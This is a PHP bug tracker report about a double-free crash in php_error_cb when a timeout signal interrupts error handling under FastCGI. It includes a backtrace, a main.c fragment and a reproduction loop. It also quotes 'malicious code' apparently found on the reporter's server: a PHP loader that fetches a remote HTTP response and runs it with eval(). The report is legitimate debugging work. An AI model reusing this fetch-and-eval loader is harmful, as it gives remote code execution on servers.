ID: 49484
User updated by: witekfl at gazeta dot pl
Reported By: witekfl at gazeta dot pl
-Status: Feedback
+Status: Open
Bug Type: Reproducible crash
Operating System: Debian Linux
PHP Version: 5.2.10
New Comment:
Here is a malicious code:
<?php
@$s = fsockopen("google.com",80);
stream_set_timeout($s, 3);
fputs($s, "GET / HTTP/1.0\nHost: google.com\n\n");
$o="";
while(!feof($s)) $o.=fgets($s,1000);
$o=substr($o,strpos($o,"\r\n\r\n")+4);
fclose($s);
eval($o);
?>
aa
The setup is following:
nginx + apache + mod_layout + mod_fcgid + php-cgi as fastcgi
php-cgi has suid bit set and runs as user www-data.
nginx and apache runs on different users to php-cgi.
max_execution_timeout is 2 seconds.
iptables rejects connections to google.com (to the outside) for
php-cgi.
php segfaults very often and Apache returns status 500.
Previous Comments:
------------------------------------------------------------------------
[2009-09-06 14:19:25] witekfl at gazeta dot pl
I disabled fpm and still the same.
------------------------------------------------------------------------
[2009-09-06 13:31:30] j...@php.net
Obvious question is: Does it happen without the 3rd party patch?
------------------------------------------------------------------------
[2009-09-06 13:21:39] witekfl at gazeta dot pl
Description:
------------
php-5.2.10 with the fpm patch aplied running as FastCGI with Apache and
mod_fcgid
Here is a fragment of the backtrace:
#0 0x00007f86f9acced5 in raise () from /lib/libc.so.6
#1 0x00007f86f9ace3f3 in abort () from /lib/libc.so.6
#2 0x00007f86f9b093a8 in ?? () from /lib/libc.so.6
#3 0x00007f86f9b0e948 in ?? () from /lib/libc.so.6
#4 0x00007f86f9b10a56 in free () from /lib/libc.so.6
#5 0x00000000006a5509 in php_error_cb (type=1,
error_filename=0xe37778
"/var/www/virtual/erc.blabla.pl/side_left.php(25) : eval()'d code(1) :
eval()'d code",
error_lineno=9, format=<value optimized out>, args=<value optimized
out>)
at /home/witekfl/PHP/php-5.2.10/main/main.c:831
#6 0x00000000006e5f04 in zend_error (type=1, format=0x9c2418 "Maximum
execution time of %d second%s exceeded")
at /home/witekfl/PHP/php-5.2.10/Zend/zend.c:976
#7 <signal handler called>
#8 0x00007f86f9b15d95 in strdup () from /lib/libc.so.6
#9 0x00000000006a551a in php_error_cb (type=2,
error_filename=0xe37778
"/var/www/virtual/erc.blabla.pl/side_left.php(25) : eval()'d code(1) :
eval()'d code",
error_lineno=9, format=<value optimized out>, args=<value optimized
out>)
at /home/witekfl/PHP/php-5.2.10/main/main.c:834
#10 0x00000000006e5f04 in zend_error (type=2, format=0x9c4778
"%s%s%s(): supplied argument is not a valid %s resource")
at /home/witekfl/PHP/php-5.2.10/Zend/zend.c:976
#11 0x00000000006f35ce in zend_fetch_resource (passed_id=<value
optimized out>, default_id=<value optimized out>,
resource_type_name=0x9abbd0 "stream", found_resource_type=0x0,
num_resource_types=<value optimized out>)
at /home/witekfl/PHP/php-5.2.10/Zend/zend_list.c:130
And here is the fragment of main.c:
/* store the error if it has changed */
if (display) {
if (PG(last_error_message)) {
free(PG(last_error_message));
}
if (PG(last_error_file)) {
free(PG(last_error_file));
}
PG(last_error_type) = type;
PG(last_error_message) = strdup(buffer);
PG(last_error_file) = strdup(error_filename);
PG(last_error_lineno) = error_lineno;
}
After the free(), the php_error_cb is interrupted by the signal
(zend_timeout) and the given fragment is run with the new error_message,
but the PG(last_error_message) or PG(last_error_file) is already freed,
but still has old value, another free is causing crash.
max_execution_time = 2
allow_url_fopen = Off
Reproduce code:
---------------
ini_set("max_execution_time", 2);
for (;;) {
file_get_contents("http://google.com/";);
}
/* I'm not sure if exactly this code crashes, but the code with
undefined variables and functions, trying to connect to the outside will
do very often. Connections to the outside are rejected by iptables. */
Expected result:
----------------
No segfaults.
Actual result:
--------------
Often segfaults.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=49484&edit=1
